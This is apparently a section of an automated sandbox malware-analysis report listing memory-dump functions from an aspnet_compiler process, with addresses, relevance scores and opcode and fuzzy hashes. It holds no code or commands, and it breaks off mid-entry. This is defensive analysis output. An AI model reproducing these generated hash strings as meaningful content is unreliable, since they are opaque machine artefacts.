                                                                • Opcode ID: bd922d589ceb8d1002abbc38e56bca6b72407996df9fd16311e4f431f81539ea
                                                                • Instruction ID: 8b5fc86cb17a74c17c508003e3ff3c0f97310653a67c6343d0e5ccd8c4e7a490
                                                                • Opcode Fuzzy Hash: bd922d589ceb8d1002abbc38e56bca6b72407996df9fd16311e4f431f81539ea
                                                                • Instruction Fuzzy Hash: 2C814F70A19A5D9FDB94DFA8C464BACBBF1FF69300F1141E9D00DE72A1DA34A981CB01
                                                                Function 00007FFD9B96463C Relevance: .2, Instructions: 213COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 004bcdd01062eea50738cf25c51f96370e908fe03f2e533471b702633907d936
                                                                • Instruction ID: db304656a2cdf2c63ce855d386e5768566088535f8d11862681299d0af9e8252
                                                                • Opcode Fuzzy Hash: 004bcdd01062eea50738cf25c51f96370e908fe03f2e533471b702633907d936
                                                                • Instruction Fuzzy Hash: BF714270E19A5D9FDB98DBA8C465BACBBF1FF69300F5040AED00DE72A1CA355981CB01
                                                                Function 00007FFD9B963E25 Relevance: .2, Instructions: 208COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7fece0036d4a53c05e1799388918b95b5d86c4143e5be880c77c366cd3b60a16
                                                                • Instruction ID: 70a7253028766a7793ff02d1298e0eb7cd939a72157919e14c709bbe4f613891
                                                                • Opcode Fuzzy Hash: 7fece0036d4a53c05e1799388918b95b5d86c4143e5be880c77c366cd3b60a16
                                                                • Instruction Fuzzy Hash: 79714B70A19A5D9FDB94DBA8C465BA8BBF1FF59300F1140EED05ED72A1CA346981CB01
                                                                Function 00007FFD9B964235 Relevance: .2, Instructions: 207COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d8616d4fbc04e01e97ae7a3e4f6e671df2842290298e5322847e2aa641b83ed
                                                                • Instruction ID: aa0782af5ca68dd7178935b553a7450a268d5a32992ccb5984a377436aa643ba
                                                                • Opcode Fuzzy Hash: 7d8616d4fbc04e01e97ae7a3e4f6e671df2842290298e5322847e2aa641b83ed
                                                                • Instruction Fuzzy Hash: AA715C70A19A5D9FDB94DBA8C465BACBBF1FF59300F1040EED04ED72A1CA345981CB01
                                                                Function 00007FFD9B965298 Relevance: .2, Instructions: 200COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 65d822601e67078733d20ea58d1873a24a507f351f0c62f03c0e7801aad2afa1
                                                                • Instruction ID: b98d4a4539ccb0b9474a62501b3f4bf6a802f5d73d64332383830c0c7ab2c9d2
                                                                • Opcode Fuzzy Hash: 65d822601e67078733d20ea58d1873a24a507f351f0c62f03c0e7801aad2afa1
                                                                • Instruction Fuzzy Hash: D651EF11EBF24FBEE27573A855FE5BA27509F43704F87AD76E04C4A0F78C89A6084251
                                                                Function 00007FFD9B96AA54 Relevance: .2, Instructions: 185COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 39240c58cacf59ea9a3ced44e8b9f819aa01c0de982e3dc6329ccc44412fe98c
                                                                • Instruction ID: ddfc354a101f0878947044d94357015c0e9958e2e2fcf866ea64f8f378314ef5
                                                                • Opcode Fuzzy Hash: 39240c58cacf59ea9a3ced44e8b9f819aa01c0de982e3dc6329ccc44412fe98c
                                                                • Instruction Fuzzy Hash: A9716130D1A61E9FEB69EB64C861AE9B7B1FF10310F1142B9D41D971A1DF386B89CB40
                                                                Function 00007FFD9B966AC7 Relevance: .2, Instructions: 178COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c6f1778dc841a50542a14804279b53b80cdfb08af42a60cada2c5e47171056c1
                                                                • Instruction ID: 7083fa0c2fe8a286b312b5d34ebe944dba56f1303b199d1ee9250463f49a188e
                                                                • Opcode Fuzzy Hash: c6f1778dc841a50542a14804279b53b80cdfb08af42a60cada2c5e47171056c1
                                                                • Instruction Fuzzy Hash: FD61C370E1961D8FDBA9DB68C8A4BECB7B1FF59301F1041A9D00DE72A1CA346A81CF51
                                                                Function 00007FFD9B9652C8 Relevance: .2, Instructions: 177COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78e9059aae43f44fc08f1f369f9d95235d949cc8d7efc57ed1a4d18bf1a49c94
                                                                • Instruction ID: 084005bb193a428c4bcce2455d1f2f7e9d876ff5eadb5fb016962c94cc7b5ecf
                                                                • Opcode Fuzzy Hash: 78e9059aae43f44fc08f1f369f9d95235d949cc8d7efc57ed1a4d18bf1a49c94
                                                                • Instruction Fuzzy Hash: 7941A511EBF24FBEE17533A945FE6BB22509F43B40F93AD35E40C491BB8C99A3184180
                                                                Function 00007FFD9B965210 Relevance: .2, Instructions: 176COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1336f77ab570a2442cc866adb78de353a0aff32f94f6d529f28237a4abcd870b
                                                                • Instruction ID: 42d644bb2946ed0ee24ec510b9dd39868e9a184cbf27a8cc27cf305281ea6854
                                                                • Opcode Fuzzy Hash: 1336f77ab570a2442cc866adb78de353a0aff32f94f6d529f28237a4abcd870b
                                                                • Instruction Fuzzy Hash: 3341B112BBF15FAEE22633A854FE5FA1750DF43715F87AD76E05C890F78C88A6054250
                                                                Function 00007FFD9B966D0B Relevance: .2, Instructions: 176COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 277c68a5e127fffe43588b53876b8fbe662438adfdb6d1f67f2018e523f9430e
                                                                • Instruction ID: b743831b9cc517e89d9a58456435cda019265c7c7aec495a87f550f7ba56db8e
                                                                • Opcode Fuzzy Hash: 277c68a5e127fffe43588b53876b8fbe662438adfdb6d1f67f2018e523f9430e
                                                                • Instruction Fuzzy Hash: 2D61D730E1951E9FDBA8DBA8C4A4BEDB7B1FF59305F5041A9D00DA3291CA386A81CF54
                                                                Function 00007FFD9B963A47 Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1fa920df7fad9a19c9f7c9c3265949ee948ae2ecff55ecbb4b0d220673924391
                                                                • Instruction ID: 1437fd83bde54673f6959258d1fbe68f805f455bb3f037a6db91876ecd3ef4db
                                                                • Opcode Fuzzy Hash: 1fa920df7fad9a19c9f7c9c3265949ee948ae2ecff55ecbb4b0d220673924391
                                                                • Instruction Fuzzy Hash: E0513C70A1D65D9FDB98DB68C465BA8BBF1FF69300F4141EED04DD72A2DA346980CB01
                                                                Function 00007FFD9B963E57 Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a20cb28f93ceda1e0e6515aaada675a5e8a828cf14c2955e7b54d0dce3b2f0e5
                                                                • Instruction ID: 3410da6c4f64918c88cdd3e02d8366e3eab3a93037bf07ace9f26e8b79ad3d1d
                                                                • Opcode Fuzzy Hash: a20cb28f93ceda1e0e6515aaada675a5e8a828cf14c2955e7b54d0dce3b2f0e5
                                                                • Instruction Fuzzy Hash: 37513A70A1DA5D9FDB98DBA8C465BA8BBF1FF69300F5040AED05DD72A1CA346980CB01
                                                                Function 00007FFD9B963227 Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb65ba481af5cef63f638559dc6dad6c9888810b2a5ef4237ffecf68f5ddbf9d
                                                                • Instruction ID: 02678ea4ccce981a89155861273b933888e10155fdcf3d8a1234983e53a95383
                                                                • Opcode Fuzzy Hash: bb65ba481af5cef63f638559dc6dad6c9888810b2a5ef4237ffecf68f5ddbf9d
                                                                • Instruction Fuzzy Hash: FF511C70A1DA5D9FDB98EB68C465BADBBF1FF69300F5041EAD04DD72A1CA346980CB01
                                                                Function 00007FFD9B963637 Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8ce70fffb7ab615650fc67c17d250c5dbba090dbf2f8d65e81da9c895046ab1
                                                                • Instruction ID: e044fa2eb7b9aa7d4e40a88b917b8b73860f42f2fa93e62d4f85eb846799af9f
                                                                • Opcode Fuzzy Hash: e8ce70fffb7ab615650fc67c17d250c5dbba090dbf2f8d65e81da9c895046ab1
                                                                • Instruction Fuzzy Hash: EC512D70A1D65D9FDB98DB68C465BA9BBF1FF69300F5041EAD04DD72A1CA34A980CB01
                                                                Function 00007FFD9B964A87 Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f471f76f33d510cb3b17ce2455affe762e5b030f36601c083b8fe8122ca3a92
                                                                • Instruction ID: 3e4c9c5761c9c043c7329ea120a288b56e75341ae71e1605b2f86888905e604d
                                                                • Opcode Fuzzy Hash: 7f471f76f33d510cb3b17ce2455affe762e5b030f36601c083b8fe8122ca3a92
                                                                • Instruction Fuzzy Hash: 6F515D70A19A5D9FDB98DBA8C465BACBBF1FF69300F4041EED04DD72A1DA346980CB01
                                                                Function 00007FFD9B964267 Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d3ee4de9625e8003f33b0c83bfb2f8ec088b2231a85507601cbb607739fbf0d
                                                                • Instruction ID: 9103c265527c30fb4b52e46c0e26ca452442ab5cfd6552d98eab278e597a167e
                                                                • Opcode Fuzzy Hash: 7d3ee4de9625e8003f33b0c83bfb2f8ec088b2231a85507601cbb607739fbf0d
                                                                • Instruction Fuzzy Hash: 7B512D70A19A5D9FDB98DBA8C465BADBBF1FF69300F5041EED04DD72A1CA345980CB01
                                                                Function 00007FFD9B964677 Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2297fba201b144835da9c3aeefcec276c3d6c2b8c460e29e82064c61ac6fed8d
                                                                • Instruction ID: eb4c9a4a65510d9d8db8eccac2c832bfe8d1a3b1db24d30bfea242de31b74901
                                                                • Opcode Fuzzy Hash: 2297fba201b144835da9c3aeefcec276c3d6c2b8c460e29e82064c61ac6fed8d
                                                                • Instruction Fuzzy Hash: 56513C70E1965D9FDB98DBA8C465BA8BBF1FF69300F4041EED04DD72A1CA346980CB01
                                                                Function 00007FFD9B965A09 Relevance: .2, Instructions: 160COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8fe2f45a8d03611cedd9627d32f01e2a18f47047be810dc400711f860d75fa4b
                                                                • Instruction ID: fb7dc57f796d98160c375446848d0715dad132676227760058207bea0089801c
                                                                • Opcode Fuzzy Hash: 8fe2f45a8d03611cedd9627d32f01e2a18f47047be810dc400711f860d75fa4b
                                                                • Instruction Fuzzy Hash: CF51AD30A0A24E9FDB559FB4C469AADBBB0FF16314F5141BEC00ADB1A2CB385946CB41
                                                                Function 00007FFD9B960738 Relevance: .1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd1657bf252f80252516d580ab2de52e3980204b17d042fafb8fd50af239dceb
                                                                • Instruction ID: 038b4def0375d4066574debb304036f548831bb3858e324d7c0633e4698334b3
                                                                • Opcode Fuzzy Hash: cd1657bf252f80252516d580ab2de52e3980204b17d042fafb8fd50af239dceb
                                                                • Instruction Fuzzy Hash: 7F31F672A1E54EAFE7A5A7A8D8E51EC7BE0FF55620F060079D089C71F7DE2829438700
                                                                Function 00007FFD9B960740 Relevance: .1, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8219274dcb7f47b2d1ed84450edf0aa3d596d0c7b0e15577df1dcfeeb0894029
                                                                • Instruction ID: b170234b6722d6d4fbc4b2be86dbdec93f4552f0c06dfa98f643e594df6fdbdd
                                                                • Opcode Fuzzy Hash: 8219274dcb7f47b2d1ed84450edf0aa3d596d0c7b0e15577df1dcfeeb0894029
                                                                • Instruction Fuzzy Hash: 33310672A1E58EAFE7A5A7A898E51EC7BE0FF45610F060079D049C71E6DE282942C700
                                                                Function 00007FFD9B96761A Relevance: .1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a1fea92f07a044242c4f47725d42c48448bbb399b0da1ec06b9dd4f56ca0df56
                                                                • Instruction ID: 239f899cee26dd38b07f1c889529652e1445c64509abd85149299569e3f45119
                                                                • Opcode Fuzzy Hash: a1fea92f07a044242c4f47725d42c48448bbb399b0da1ec06b9dd4f56ca0df56
                                                                • Instruction Fuzzy Hash: 91417C3090E2499FD75ADB64C864AE8BBF0FF16310F0541FAD059DB2A2CB7C5A85CB02
                                                                Function 00007FFD9B966091 Relevance: .1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8408b569dd53bc3ce7d0b183f7a96abf79471247cd990a3ad74bec6890334b6a
                                                                • Instruction ID: b5025cdb685f59fb1e0466eafb988eec800c81f3a4b0c6a812328890f46e259e
                                                                • Opcode Fuzzy Hash: 8408b569dd53bc3ce7d0b183f7a96abf79471247cd990a3ad74bec6890334b6a
                                                                • Instruction Fuzzy Hash: C8316871A0A64E9FE745ABA488357EDBFE0FF56320F4141FAC008C71E6EA3828458342
                                                                Function 00007FFD9B960748 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7610941fe5d5a536c4bbd14a56f3e0b87e9976b31f577ab5c160072c3c48026a
                                                                • Instruction ID: fdc76e22c4a425f7162aa969183d87c607b7b9f1b4710a0ed4507d36b1b55322
                                                                • Opcode Fuzzy Hash: 7610941fe5d5a536c4bbd14a56f3e0b87e9976b31f577ab5c160072c3c48026a
                                                                • Instruction Fuzzy Hash: 3531F672A1E58EAFE7A5A7B898E51EC7BE0FF55610F460079D049C71F7DE282942C700
                                                                Function 00007FFD9B960CEE Relevance: .1, Instructions: 80COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5893f1969d451239d0881bdae15a60a4359aba6ac3c6d693ea1215d70ca6309
                                                                • Instruction ID: 8b350579527aea41c10353b4f2d57d7c38a146276e51b742ea530cce2b7803ff
                                                                • Opcode Fuzzy Hash: a5893f1969d451239d0881bdae15a60a4359aba6ac3c6d693ea1215d70ca6309
                                                                • Instruction Fuzzy Hash: 8131E870955A5D9FEB91EB78885E7D9BBF4FF29300F1440EAC04DD7261DA385E868B00
                                                                Function 00007FFD9B961DA9 Relevance: .1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6011629861d8d48b0f16a5d299cec0fcea4dc0a92b622e14fa7b741bcdafea61
                                                                • Instruction ID: 231e227d341ef6b346316de160d8f740455a4012e5237502d797cffde695e0e5
                                                                • Opcode Fuzzy Hash: 6011629861d8d48b0f16a5d299cec0fcea4dc0a92b622e14fa7b741bcdafea61
                                                                • Instruction Fuzzy Hash: 55218170919A4C8FDB81EBA8C859ADD7FF0FF19310F04056AD008D71A2DB349981CB41
                                                                Function 00007FFD9B960CD0 Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 15480eb5cd9bf7a716e3a3355d560d211e654db8a549bf2d6d4409a70946c508
                                                                • Instruction ID: d2eb113e35b3655f1b30e61aaf63bbc1cf8f7f4a937e3b00c93da035b67157a7
                                                                • Opcode Fuzzy Hash: 15480eb5cd9bf7a716e3a3355d560d211e654db8a549bf2d6d4409a70946c508
                                                                • Instruction Fuzzy Hash: 8431FBB0945A5DAFDB91EB78885E7D9BBF4FF19300F5440EAC04DC7261DA385D828B00
                                                                Function 00007FFD9B96ABB4 Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81a49528390821a38dba7985c7b7a858969b19b3c4561360891ca226b03dcf9f
                                                                • Instruction ID: 5354a93f6ba4ce2085818b2b46d6c93503d812c1ca153ee9225cd55889a85498
                                                                • Opcode Fuzzy Hash: 81a49528390821a38dba7985c7b7a858969b19b3c4561360891ca226b03dcf9f
                                                                • Instruction Fuzzy Hash: A1212A70E2961E9FEB65DF98C854BEDB7B1FF44304F0041A8D019A32A4DB386A85CF80
                                                                Function 00007FFD9B968412 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88268304dab62ea07c4cb3b99ea300aba06aff18e9433c1a6f3c2c6c5105347f
                                                                • Instruction ID: fb3b6010d15129b814e332c087ae506ecc4809b55b91cc5f02574866df6624bc
                                                                • Opcode Fuzzy Hash: 88268304dab62ea07c4cb3b99ea300aba06aff18e9433c1a6f3c2c6c5105347f
                                                                • Instruction Fuzzy Hash: 5C116A3048E6CA5FD3435BB08C286D67FB1AF87324F0940E6D089CB0A2C96D5A4AC722
                                                                Function 00007FFD9B966A26 Relevance: .1, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cfbfcaaa1bfec6566989af85d2fda98edbf9b78d62e15b0407091dca9433a738
                                                                • Instruction ID: 6e37162c5df9369eb890f78c6b1b1f64086ef85a5ab327a23d2f97d1f3cf7c75
                                                                • Opcode Fuzzy Hash: cfbfcaaa1bfec6566989af85d2fda98edbf9b78d62e15b0407091dca9433a738
                                                                • Instruction Fuzzy Hash: 7C218CB0A1A7488FDB5ADB64C855A987FB0FF1A311F1140EAD089DB2A2DA355D81CB10
                                                                Function 00007FFD9B96AB8A Relevance: .0, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 554c933d042e459bfdfb0badabf6837bcea63c54efac2fedb075618c5abfe0e3
                                                                • Instruction ID: e6493efeb43254d0b14e649a5ab29701a49285b1dcca108075cf6eb519426c12
                                                                • Opcode Fuzzy Hash: 554c933d042e459bfdfb0badabf6837bcea63c54efac2fedb075618c5abfe0e3
                                                                • Instruction Fuzzy Hash: 69015E30D1974E9FDBAADF58C864AEDB7B1FF44300F0042A9D419932A1DB386A46CF40
                                                                Function 00007FFD9B96AB98 Relevance: .0, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7ffd9b960000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be3561b3048cc52e4d4033134f72530797dddbce1c1604ee0ef73c692e516e03
                                                                • Instruction ID: 7738c81a9200d107f6978ef8f8cb29a20d347c864fde95c3d7c1fce5650e5189
                                                                • Opcode Fuzzy Hash: be3561b3048cc52e4d4033134f72530797dddbce1c1604ee0ef73c692e516e03
                                                                • Instruction Fuzzy Hash: D1010C70E2961E9FEBA9DF98C851BEDB7B1FF44304F100169D419932A0DB386A46CB40
                                                                Function 00007FFD9B96776B Relevance: .0, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2966933626.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                Joe Sandbox IDA Plugin
